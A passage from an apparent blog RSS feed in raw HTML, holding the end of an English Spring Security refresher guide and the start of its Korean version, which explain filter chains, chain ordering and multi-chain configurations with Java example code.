class="o">(</span><span class="s">"USER"</span><span class="o">)</span> <span class="c1">// Specific rule</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="s">"/secured/admin"</span><span class="o">).</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">)</span> <span class="c1">// Specific rule</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <p><strong>Critical point:</strong> If you specify a <code class="language-plaintext highlighter-rouge">securityMatcher</code>, only matching requests are protected. Non-matching requests won’t be protected by Spring Security at all! That’s why it’s recommended to have a default chain without a <code class="language-plaintext highlighter-rouge">securityMatcher</code>.</p> <h2 id="securityfilterchain-endpoints-a-gotcha">SecurityFilterChain Endpoints: A Gotcha</h2> <p>Endpoints provided by the filter chain (like <code class="language-plaintext highlighter-rouge">/login</code>, <code class="language-plaintext highlighter-rouge">/logout</code>) aren’t automatically affected by <code class="language-plaintext highlighter-rouge">securityMatcher</code>:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">1</span><span class="o">)</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">securedFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/secured/**"</span><span class="o">)</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">((</span><span class="n">formLogin</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">formLogin</span> <span class="o">.</span><span class="na">loginPage</span><span class="o">(</span><span class="s">"/secured/login"</span><span class="o">)</span> <span class="c1">// Custom path</span> <span class="o">.</span><span class="na">loginProcessingUrl</span><span class="o">(</span><span class="s">"/secured/login"</span><span class="o">)</span> <span class="c1">// Custom path</span> <span class="o">.</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">logout</span><span class="o">((</span><span class="n">logout</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">logout</span> <span class="o">.</span><span class="na">logoutUrl</span><span class="o">(</span><span class="s">"/secured/logout"</span><span class="o">)</span> <span class="o">.</span><span class="na">logoutSuccessUrl</span><span class="o">(</span><span class="s">"/secured/login?logout"</span><span class="o">)</span> <span class="o">.</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">defaultFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">denyAll</span><span class="o">()</span> <span class="c1">// Deny everything else</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <h2 id="real-world-example-a-banking-system">Real-World Example: A Banking System</h2> <p>Let’s look at a more complex, realistic example:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">BankingSecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">UserDetailsService</span> <span class="nf">userDetailsService</span><span class="o">()</span> <span class="o">{</span> <span class="nc">UserBuilder</span> <span class="n">users</span> <span class="o">=</span> <span class="nc">User</span><span class="o">.</span><span class="na">withDefaultPasswordEncoder</span><span class="o">();</span> <span class="nc">InMemoryUserDetailsManager</span> <span class="n">manager</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">InMemoryUserDetailsManager</span><span class="o">();</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user1"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">,</span> <span class="s">"VIEW_BALANCE"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user2"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"admin"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="k">return</span> <span class="n">manager</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">1</span><span class="o">)</span> <span class="c1">// Highest priority</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">approvalsSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">approvalsPaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/accounts/approvals/**"</span><span class="o">,</span> <span class="s">"/loans/approvals/**"</span><span class="o">,</span> <span class="s">"/credit-cards/approvals/**"</span> <span class="o">};</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="n">approvalsPaths</span><span class="o">)</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">)</span> <span class="o">)</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">2</span><span class="o">)</span> <span class="c1">// Second priority</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">bankingSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">bankingPaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/accounts/**"</span><span class="o">,</span> <span class="s">"/loans/**"</span><span class="o">,</span> <span class="s">"/credit-cards/**"</span><span class="o">,</span> <span class="s">"/balances/**"</span> <span class="o">};</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">viewBalancePaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/balances/**"</span> <span class="o">};</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="n">bankingPaths</span><span class="o">)</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="n">viewBalancePaths</span><span class="o">).</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"VIEW_BALANCE"</span><span class="o">)</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"USER"</span><span class="o">)</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="c1">// Default chain (lowest priority)</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">defaultSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">allowedPaths</span> <span class="o">=</span> <span class="o">{</span> <span class="s">"/"</span><span class="o">,</span> <span class="s">"/user-login"</span><span class="o">,</span> <span class="s">"/user-logout"</span><span class="o">,</span> <span class="s">"/notices"</span><span class="o">,</span> <span class="s">"/contact"</span><span class="o">,</span> <span class="s">"/register"</span> <span class="o">};</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">requestMatchers</span><span class="o">(</span><span class="n">allowedPaths</span><span class="o">).</span><span class="na">permitAll</span><span class="o">()</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">((</span><span class="n">formLogin</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">formLogin</span> <span class="o">.</span><span class="na">loginPage</span><span class="o">(</span><span class="s">"/user-login"</span><span class="o">)</span> <span class="o">.</span><span class="na">loginProcessingUrl</span><span class="o">(</span><span class="s">"/user-login"</span><span class="o">)</span> <span class="o">)</span> <span class="o">.</span><span class="na">logout</span><span class="o">((</span><span class="n">logout</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">logout</span> <span class="o">.</span><span class="na">logoutUrl</span><span class="o">(</span><span class="s">"/user-logout"</span><span class="o">)</span> <span class="o">.</span><span class="na">logoutSuccessUrl</span><span class="o">(</span><span class="s">"/?logout"</span><span class="o">)</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p>How this works:</p> <ol> <li> <p><strong>Approval paths</strong> (<code class="language-plaintext highlighter-rouge">@Order(1)</code>): <code class="language-plaintext highlighter-rouge">/accounts/approvals/**</code>, <code class="language-plaintext highlighter-rouge">/loans/approvals/**</code>, <code class="language-plaintext highlighter-rouge">/credit-cards/approvals/**</code> require ADMIN role and use HTTP Basic auth</p> </li> <li><strong>Banking paths</strong> (<code class="language-plaintext highlighter-rouge">@Order(2)</code>): For <code class="language-plaintext highlighter-rouge">/accounts/**</code>, <code class="language-plaintext highlighter-rouge">/loans/**</code>, <code class="language-plaintext highlighter-rouge">/credit-cards/**</code>, <code class="language-plaintext highlighter-rouge">/balances/**</code>: <ul> <li><code class="language-plaintext highlighter-rouge">/balances/**</code> requires <code class="language-plaintext highlighter-rouge">VIEW_BALANCE</code> role</li> <li>Everything else requires <code class="language-plaintext highlighter-rouge">USER</code> role</li> <li>Requests with <code class="language-plaintext highlighter-rouge">/approvals/</code> already matched the first chain, so they won’t hit this one</li> </ul> </li> <li><strong>Default paths</strong> (lowest priority): <ul> <li><code class="language-plaintext highlighter-rouge">/</code>, <code class="language-plaintext highlighter-rouge">/user-login</code>, <code class="language-plaintext highlighter-rouge">/user-logout</code>, <code class="language-plaintext highlighter-rouge">/notices</code>, <code class="language-plaintext highlighter-rouge">/contact</code>, <code class="language-plaintext highlighter-rouge">/register</code> are publicly accessible</li> <li>Everything else requires authentication</li> <li>Uses form login</li> </ul> </li> </ol> <h2 id="wrapping-up">Wrapping Up</h2> <p>Spring Security essentials in a nutshell:</p> <ol> <li><strong>Filter-based architecture</strong>: Built on servlet filters</li> <li><strong>DelegatingFilterProxy</strong>: Bridges servlet container and Spring</li> <li><strong>FilterChainProxy</strong>: Routes requests to the right SecurityFilterChain</li> <li><strong>SecurityFilterChain</strong>: Collection of actual security filters</li> <li><strong>Priority</strong>: Use <code class="language-plaintext highlighter-rouge">@Order</code> to control chain execution order</li> <li><strong>Matcher distinction</strong>: <code class="language-plaintext highlighter-rouge">securityMatcher</code> (chain scope) vs <code class="language-plaintext highlighter-rouge">requestMatchers</code> (individual rules)</li> </ol> <p>Bookmark this page for the next time you need to dust off your Spring Security knowledge. You’ll thank yourself later! 🚀</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Mon, 12 Jan 2026 11:16:00 +0900 http://thecodinglog.github.io/spring/security/2026/01/12/refresher-guide-spring-security.html http://thecodinglog.github.io/spring/security/2026/01/12/refresher-guide-spring-security.html Spring Security Spring Security 스프링 시큐리티, 이 글 하나로 기억 되살리기 🔐 <p>오랜만에 스프링 시큐리티 설정을 만지려고 하면 “어, 이게 뭐였지?” 싶은 순간이 오죠. 필터 체인이니 뭐니 하는 용어들이 머릿속에서 뒤죽박죽 섞여버립니다. 이 글은 그런 분들을 위해 스프링 시큐리티 7의 핵심 아키텍처를 쉽게 정리했습니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h1 id="시작하기-전에-서블릿-필터부터-이해하자">시작하기 전에: 서블릿 필터부터 이해하자</h1> <p>스프링 시큐리티를 이해하려면 먼저 서블릿 필터가 뭔지 알아야 합니다.</p> <p>클라이언트가 HTTP 요청을 보내면, 서블릿 컨테이너는 <code class="language-plaintext highlighter-rouge">FilterChain</code>을 만듭니다. 이 체인에는 여러 <code class="language-plaintext highlighter-rouge">Filter</code> 인스턴스들과 최종 목적지인 <code class="language-plaintext highlighter-rouge">Servlet</code>(스프링 MVC에서는 <code class="language-plaintext highlighter-rouge">DispatcherServlet</code>)이 포함되어 있죠.</p> <p>필터는 두 가지 일을 할 수 있습니다:</p> <ul> <li>요청을 가로채서 뒤에 있는 필터나 서블릿이 실행되지 않게 막기 (주로 응답을 직접 작성)</li> <li>요청이나 응답을 수정해서 다음 단계로 넘기기</li> </ul> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Override</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">doFilter</span><span class="o">(</span><span class="nc">ServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">ServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">FilterChain</span> <span class="n">chain</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">IOException</span><span class="o">,</span> <span class="nc">ServletException</span> <span class="o">{</span> <span class="c1">// 애플리케이션 실행 전에 뭔가 하고</span> <span class="n">chain</span><span class="o">.</span><span class="na">doFilter</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="c1">// 다음 단계로 넘기고</span> <span class="c1">// 애플리케이션 실행 후에 뭔가 하기</span> <span class="o">}</span> </code></pre></div></div> <p>여기서 중요한 점: <strong>필터의 순서가 매우 중요합니다.</strong> 필터는 앞에서부터 순차적으로 실행되고, 각 필터는 자기 뒤에 있는 것들에만 영향을 주니까요.</p> <h1 id="delegatingfilterproxy-스프링과-서블릿-컨테이너를-연결하는-다리">DelegatingFilterProxy: 스프링과 서블릿 컨테이너를 연결하는 다리</h1> <p>여기서 문제가 하나 있습니다. 서블릿 컨테이너는 자체 표준으로 필터를 등록하는데, 스프링 빈에 대해서는 모릅니다.</p> <p><code class="language-plaintext highlighter-rouge">DelegatingFilterProxy</code>가 바로 이 문제를 해결합니다. 서블릿 컨테이너에는 <code class="language-plaintext highlighter-rouge">DelegatingFilterProxy</code>를 등록하고, 실제 작업은 스프링 빈으로 등록된 필터에게 위임하는 거죠.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="kt">void</span> <span class="nf">doFilter</span><span class="o">(</span><span class="nc">ServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">ServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">FilterChain</span> <span class="n">chain</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Filter</span> <span class="n">delegate</span> <span class="o">=</span> <span class="n">getFilterBean</span><span class="o">(</span><span class="n">someBeanName</span><span class="o">);</span> <span class="c1">// 스프링 빈 가져오기</span> <span class="n">delegate</span><span class="o">.</span><span class="na">doFilter</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="c1">// 실제 작업 위임</span> <span class="o">}</span> </code></pre></div></div> <p>이렇게 하면 필터 빈을 지연 로딩할 수 있다는 장점도 있습니다. 서블릿 컨테이너는 필터를 먼저 등록해야 하는데, 스프링 빈은 그보다 나중에 로드되거든요.</p> <h1 id="filterchainproxy-스프링-시큐리티의-핵심">FilterChainProxy: 스프링 시큐리티의 핵심</h1> <p>스프링 시큐리티의 서블릿 지원은 모두 <code class="language-plaintext highlighter-rouge">FilterChainProxy</code> 안에 들어있습니다. 이 녀석은 스프링 시큐리티가 제공하는 특별한 필터로, 여러 필터 인스턴스에게 작업을 위임할 수 있습니다. <code class="language-plaintext highlighter-rouge">FilterChainProxy</code>는 빈이기 때문에 보통 <code class="language-plaintext highlighter-rouge">DelegatingFilterProxy</code>로 감싸져 있죠.</p> <p><code class="language-plaintext highlighter-rouge">FilterChainProxy</code>가 제공하는 장점들:</p> <ul> <li>스프링 시큐리티의 서블릿 지원 시작점 역할 (디버깅할 때 여기에 브레이크포인트 걸면 좋음)</li> <li><code class="language-plaintext highlighter-rouge">SecurityContext</code>를 정리해서 메모리 누수 방지</li> <li><code class="language-plaintext highlighter-rouge">HttpFirewall</code>을 적용해서 특정 공격으로부터 보호</li> <li>URL뿐만 아니라 <code class="language-plaintext highlighter-rouge">HttpServletRequest</code>의 다른 요소들도 고려해서 필터 체인 결정</li> </ul> <h1 id="securityfilterchain-실제-필터들의-집합">SecurityFilterChain: 실제 필터들의 집합</h1> <p><code class="language-plaintext highlighter-rouge">SecurityFilterChain</code>은 <code class="language-plaintext highlighter-rouge">FilterChainProxy</code>가 현재 요청에 대해 어떤 스프링 시큐리티 필터들을 실행할지 결정하는 데 사용됩니다.</p> <p>하나의 애플리케이션에 여러 개의 <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code>이 있을 수 있습니다. <code class="language-plaintext highlighter-rouge">FilterChainProxy</code>는 어떤 체인을 사용할지 결정하는데, <strong>처음으로 매칭되는 체인만 실행됩니다.</strong></p> <p>예를 들어:</p> <ul> <li><code class="language-plaintext highlighter-rouge">/api/messages/</code> 요청이 오면 → <code class="language-plaintext highlighter-rouge">/api/**</code> 패턴의 <code class="language-plaintext highlighter-rouge">SecurityFilterChain0</code>에 먼저 매칭되어 실행</li> <li><code class="language-plaintext highlighter-rouge">/messages/</code> 요청이 오면 → <code class="language-plaintext highlighter-rouge">SecurityFilterChain0</code>에 안 맞으니 다음 체인들을 시도</li> </ul> <p>각 <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code>은 독립적으로 설정할 수 있고, 포함된 필터의 개수도 다를 수 있습니다. 심지어 필터가 0개인 체인도 만들 수 있어요 (특정 요청을 스프링 시큐리티가 무시하게 하려면).</p> <h1 id="security-filters-실행-순서가-중요하다">Security Filters: 실행 순서가 중요하다</h1> <p>보안 필터들은 특정 순서대로 실행됩니다. 예를 들어 인증을 수행하는 필터가 인가를 수행하는 필터보다 먼저 실행되어야겠죠?</p> <p>다음 설정을 보세요:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">filterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">csrf</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">);</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p>이 설정은 다음 순서로 필터를 실행합니다:</p> <ol> <li><code class="language-plaintext highlighter-rouge">CsrfFilter</code> - CSRF 공격 방어</li> <li><code class="language-plaintext highlighter-rouge">BasicAuthenticationFilter</code> - HTTP Basic 인증</li> <li><code class="language-plaintext highlighter-rouge">UsernamePasswordAuthenticationFilter</code> - 폼 로그인 인증</li> <li><code class="language-plaintext highlighter-rouge">AuthorizationFilter</code> - 인가 처리</li> </ol> <h1 id="실전-설정-기본부터-시작하기">실전 설정: 기본부터 시작하기</h1> <p>가장 기본적인 스프링 시큐리티 설정은 이렇습니다:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">WebSecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">UserDetailsService</span> <span class="nf">userDetailsService</span><span class="o">()</span> <span class="o">{</span> <span class="nc">InMemoryUserDetailsManager</span> <span class="n">manager</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">InMemoryUserDetailsManager</span><span class="o">();</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="nc">User</span><span class="o">.</span><span class="na">withDefaultPasswordEncoder</span><span class="o">()</span> <span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user"</span><span class="o">)</span> <span class="o">.</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">)</span> <span class="o">.</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">)</span> <span class="o">.</span><span class="na">build</span><span class="o">());</span> <span class="k">return</span> <span class="n">manager</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p>이 간단한 설정만으로도:</p> <ul> <li>모든 URL에 대해 인증 요구</li> <li>로그인 폼 자동 생성</li> <li>폼 기반 인증 지원</li> <li>로그아웃 지원</li> <li>CSRF 공격 방어</li> <li>세션 고정 공격 방어</li> <li>보안 헤더 통합 (HSTS, X-Content-Type-Options 등)</li> <li>서블릿 API 메서드 통합</li> </ul> <p>이 모든 게 작동합니다!</p> <h1 id="httpsecurity-세밀한-제어">HttpSecurity: 세밀한 제어</h1> <p>위의 기본 설정은 사실 내부적으로 이런 <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code>을 만듭니다:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">filterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">authenticated</span><span class="o">()</span> <span class="o">)</span> <span class="o">.</span><span class="na">formLogin</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">())</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <p>이 설정은:</p> <ul> <li>모든 요청에 인증 필요</li> <li>폼 로그인 허용</li> <li>HTTP Basic 인증 허용</li> </ul> <h1 id="여러-개의-httpsecurity-영역별로-다른-보안-설정">여러 개의 HttpSecurity: 영역별로 다른 보안 설정</h1> <p>실제 애플리케이션에서는 영역마다 다른 보안 설정이 필요할 때가 많습니다. 여러 개의 <code class="language-plaintext highlighter-rouge">SecurityFilterChain</code> 빈을 등록하면 됩니다:</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">MultiHttpSecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">UserDetailsService</span> <span class="nf">userDetailsService</span><span class="o">()</span> <span class="o">{</span> <span class="nc">UserBuilder</span> <span class="n">users</span> <span class="o">=</span> <span class="nc">User</span><span class="o">.</span><span class="na">withDefaultPasswordEncoder</span><span class="o">();</span> <span class="nc">InMemoryUserDetailsManager</span> <span class="n">manager</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">InMemoryUserDetailsManager</span><span class="o">();</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"user"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="n">manager</span><span class="o">.</span><span class="na">createUser</span><span class="o">(</span><span class="n">users</span><span class="o">.</span><span class="na">username</span><span class="o">(</span><span class="s">"admin"</span><span class="o">).</span><span class="na">password</span><span class="o">(</span><span class="s">"password"</span><span class="o">).</span><span class="na">roles</span><span class="o">(</span><span class="s">"USER"</span><span class="o">,</span><span class="s">"ADMIN"</span><span class="o">).</span><span class="na">build</span><span class="o">());</span> <span class="k">return</span> <span class="n">manager</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">1</span><span class="o">)</span> <span class="c1">// 우선순위 높음</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">apiFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/api/**"</span><span class="o">)</span> <span class="c1">// /api/**에만 적용</span> <span class="o">.</span><span class="na">authorizeHttpRequests</span><span class="o">((</span><span class="n">authorize</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="n">authorize</span> <span class="o">.</span><span class="na">anyRequest</span><span class="o">().</span><span class="na">hasRole</span><span class="o">(</span><span class="s">"ADMIN"</span><span class="o">)</span> <span class="o">)</span> <span class="o">.</span><span class="na">httpBasic</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> <span class="nd">@Bean</span> <span class="c1">// @Order 없으면 가장 낮은 우선순위</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">formLoginFilterChain</span><span class="o">(</span><span 